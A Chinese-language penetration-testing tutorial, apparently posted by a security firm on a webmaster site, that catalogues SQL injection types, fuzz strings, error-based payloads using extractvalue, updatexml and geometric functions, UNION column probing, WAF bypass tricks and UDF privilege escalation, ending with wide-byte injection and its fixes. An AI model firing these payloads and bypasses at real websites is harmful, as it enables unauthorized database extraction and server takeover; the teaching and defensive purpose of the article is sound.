当前位置:首页 >  站长 >  建站经验 >  正文

渗透测试对网站注入攻击方法剖析

 2019-09-30 09:54  来源: A5用户投稿   我来投稿   websafe的个人主页 撤稿纠错

  短视频,自媒体,达人种草一站服务

国庆即将到来,前一期讲到获取网站信息判断所属环境以及各个端口的用处和弱口令密码利用方法,这期仍有很多客户找到我们Sine安全想要了解针对于SQL注入攻击的测试方法,这一期我们来讲解下注入的攻击分类和使用手法,让客户明白漏洞是如何产生的,会给网站安全带来怎样的影响!

3.1 SQL注入漏洞

3.1.1. 注入分类

SQL注入是一种代码注入技术,用于攻击数据驱动的应用程序。在应用程序中,如果没有做恰当的过滤,则可能使得恶意的SQL语句被插入输入字段中执行(例如将数据库内容转储给攻击者)。

3.1.1.1. 按技巧分类

根据使用的技巧,SQL注入类型可分为

盲注

布尔盲注:只能从应用返回中推断语句执行后的布尔值

时间盲注:应用没有明确的回显,只能使用特定的时间函数来判断

报错注入:应用会显示全部或者部分的报错信息

堆叠注入:有的应用可以加入 ; 后一次执行多条语句

其他

3.1.1.2. 按获取数据的方式分类

另外也可以根据获取数据的方式分为3类

inband

利用Web应用来直接获取数据

如报错注入

都是通过站点的响应或者错误反馈来提取数据

inference

通过Web的一些反映来推断数据

如布尔盲注和堆叠注入

也就是我们通俗的盲注,

通过web应用的其他改变来推断数据

out of band(OOB)

通过其他传输方式来获得数据,比如DNS解析协议和电子邮件

3.1.2. 注入检测

3.1.2.1. 常见的注入点

GET/POST/PUT/DELETE参数

X-Forwarded-For

文件名

3.1.2.2. Fuzz注入点

' / "

1/1

1/0

and 1=1

" and "1"="1

and 1=2

or 1=1

or 1=

' and '1'='1

+ - ^ * % /

<< >> || | & &&

~

!

@

反引号执行

3.1.2.3. 测试用常量

@@version

@@servername

@@language

@@spid

3.1.2.4. 测试列数

例如 域名/index.asp?id=12+union+select+nulll,null-- ,不断增加 null 至不返回

3.1.2.5. 报错注入

select 1/0

select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a

extractvalue(1, concat(0x5c,(select user())))

updatexml(0x3a,concat(1,(select user())),1)

exp(~(SELECT * from(select user())a))

ST_LatFromGeoHash((select * from(select * from(select user())a)b))

GTID_SUBSET(version(), 1)

3.1.2.5.1. 基于geometric的报错注入

GeometryCollection((select * from (select * from(select user())a)b))

polygon((select * from(select * from(select user())a)b))

multipoint((select * from(select * from(select user())a)b))

multilinestring((select * from(select * from(select user())a)b))

LINESTRING((select * from(select * from(select user())a)b))

multipolygon((select * from(select * from(select user())a)b))

其中需要注意的是,基于exp函数的报错注入在MySQL 5.5.49后的版本已经不再生效,具体可以参考这个 commit 95825f 。

而以上列表中基于geometric的报错注入在这个 commit 5caea4 中被修复,在5.5.x较后的版本中同样不再生效。

3.1.2.6. 堆叠注入

;select 1

3.1.2.7. 注释符

#

--+

/*xxx*/

/*!xxx*/

/*!50000xxx*/

3.1.2.8. 判断过滤规则

是否有trunc

是否过滤某个字符

是否过滤关键字

slash和编码

3.1.2.9. 获取信息

判断数据库类型

and exists (select * from msysobjects ) > 0 access数据库

and exists (select * from sysobjects ) > 0 SQLServer数据库

判断数据库表

and exsits (select * from admin)

版本、主机名、用户名、库名

表和字段

确定字段数(Order By Select Into)

表名、列名

3.1.2.10. 测试权限

文件操作

读敏感文件

写shell

带外通道

网络请求

3.1.3. 权限提升

3.1.3.1. UDF提权

UDF(User Defined Function,用户自定义函数)是MySQL提供的一个功能,可以通过编写DLL扩展为MySQL添加新函数,扩充其功能。

当获得MySQL权限之后,即可通过这种方式上传自定义的扩展文件,从MySQL中执行系统命令。

3.1.4. 数据库检测

3.1.4.1. MySQL

sleep sleep(1)

benchmark BENCHMARK(5000000, MD5('test'))

字符串连接

SELECT 'a' 'b'

SELECT CONCAT('some','string')

version

SELECT @@version

SELECT version()

识别用函数

connection_id()

last_insert_id()

row_count()

3.1.4.2. Oracle

字符串连接

'a'||'oracle' --

SELECT CONCAT('some','string')

version

SELECT banner FROM v$version

SELECT banner FROM v$version WHERE rownum=1

3.1.4.3. SQLServer

WAITFOR WAITFOR DELAY '00:00:10';

SERVERNAME SELECT @@SERVERNAME

version SELECT @@version

字符串连接

SELECT 'some'+'string'

常量

@@pack_received

@@rowcount

3.1.4.4. PostgreSQL

sleep pg_sleep(1)

3.1.5. 绕过技巧

编码绕过

大小写

url编码

html编码

十六进制编码

unicode编码

注释

// -- -- + -- - # /**/ ;%00

内联注释用的更多,它有一个特性 /!**/ 只有MySQL能识别

e.g. index.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3

只过滤了一次时

union => ununionion

相同功能替换

函数替换

substring / mid / sub

ascii / hex / bin

benchmark / sleep

变量替换

user() / @@user

符号和关键字

and / &

or / |

HTTP参数

HTTP参数污染

id=1&id=2&id=3 根据容器不同会有不同的结果

HTTP分割注入

缓冲区溢出

一些C语言的WAF处理的字符串长度有限,超出某个长度后的payload可能不会被处理

二次注入有长度限制时,通过多句执行的方法改掉数据库该字段的长度绕过

3.1.6. SQL注入小技巧

3.1.6.1. 宽字节注入

一般程序员用gbk编码做开发的时候,会用 set names 'gbk' 来设定,这句话等同于

set

character_set_connection = 'gbk',

character_set_result = 'gbk',

character_set_client = 'gbk';

漏洞发生的原因是执行了 set character_set_client = 'gbk'; 之后,mysql就会认为客户端传过来的数据是gbk编码的,从而使用gbk去解码,而mysql_real_escape是在解码前执行的。但是直接用 set names 'gbk' 的话real_escape是不知道设置的数据的编码的,就会加 %5c 。此时server拿到数据解码 就认为提交的字符+%5c是gbk的一个字符,这样就产生漏洞了。

解决的办法有三种,第一种是把client的charset设置为binary,就不会做一次解码的操作。第二种是是 mysql_set_charset('gbk') ,这里就会把编码的信息保存在和数据库的连接里面,就不会出现这个问题了。第三种就是用pdo。如果期间想要渗透测试自己的网站安全性,可以联系专业的网站安全公司来处理解决,国内推荐Sinesafe,绿盟,启明星辰等等的网站安全公司,还有一些其他的编码技巧,比如latin会弃掉无效的unicode,那么admin%32在代码里面不等于admin,在数据库比较会等于admin。

申请创业报道,分享创业好点子。点击此处,共同探讨创业新机遇!

作者: websafe    /    文章:144篇

相关文章

  • 网站渗透测试行业中需要文凭吗

    渗透测试,包含全部互联网行业,实际上对文凭并不是太注重。校园招聘,尤其是大企业校园招聘,由于是应对大批量的潜在性优秀人才,一般都是设定院校、文凭的门坎,做为提升招骋高效率的过滤标准。可是假如你真有本事,用真理的客观性摆出来,让用人公司看得到,那么可直接走社会招聘的道路,文凭包含高校的院校级别,应当是

  • HMS Core安全检测服务助力开发者安全快速构建应用

    华为安全检测服务(HUAWEISafetyDetect)是华为HMSCore推出的多维度安全检测开放服务,依托华为手机TEE,在完全不影响用户体验的情况下,助力开发者快速构建应用安全,让开发者专注于应用创新。

  • 大学生如何在渗透测试行业立足

    大学本科环节的学习培训最好能以兴趣爱好为导向性,如果你并不是反感电子计算机,这好多个方向应当多多少少都能激起你的兴趣爱好,技术实质是互通的。可是,依据我的工作经验,大部分人沒有兴趣爱好,不清楚自身喜欢什么,仿佛干什么都可以,这类状况下就挑选一个最有益于自身发展趋势的。

  • 渗透测试网站漏洞代码语言分析

    近期许多网民跟我说为何出現系统漏洞的网站程序全是PHP开发设计的,而非常少有JAVA和Python的渗透案例,先不用说python,就PHP和Java谈一谈。在这以前,先何不记牢那么一个依据(眼底下也无需担心它对吗):PHP网站系统漏洞类型多但不繁杂,Java网站系统漏洞则反过来。

  • 网站服务器安全防护知识分享

    很早以前我搭建服务器只是为了测验我所学的知识点,安全没有怎么留意,服务器一直以来被各种攻击,我那时候也没怎么留意,之后我一直都在真真正正去使用服务器去搭建正式的网站了,才觉得安全性问题的紧迫性。当时服务器买的比较早,web环境用的study是相信大家对此环境都不陌生。

  • 搭建网站如何避免知识产权纠纷?

    知识产权一般都是对最终使用人进行约束和追责,因此你付费委托第三方搭建网站,但并不代表你自身就能免除侵权责任,更何况大部分建站合同对于因搭建网站所造成的知识产权侵权完全没有任何约定!

  • 从零开始自己创建一个网站的操作指南

    随着互联网时代的发展,无论是个人还是企业,都想拥有一个自己的网站,通过网站快速展示自己的商品信息。有很多人不了解一个网站是如何形成的,制作一个网站需要多少时间,具体由哪些细节都是全然不知。他们甚至感觉搭建一个网站是一件非常复杂的事情,其实,网站建设并没有那么复杂,也没那么简单。其实现在做一个基本使用

  • 商城系统建设心得,轻松搞定选择困难

    商城软件的后续服务也是一个非常关键的地方。所以服务好的电商软件提供商会更靠谱些。至于怎么判断软件提供商服务是否靠谱?我的建议是多与在线客服直接交流,看他们回复水平与服务质量,从细节入手进行判断。

    标签:
    商城系统
  • PageAdmin CMS站群系统教程:网站站群的添加和管理

    pageadmincms是一个很知名的cms网站管理系统,目前在国内拥有超过数百万的用户,很多人用来搭建博客网站,做府门户,学校门户,也可以构建信息门户网站,这个系统后台有很灵活的扩展性

榜单

热门排行

信息推荐

扫一扫关注最新创业资讯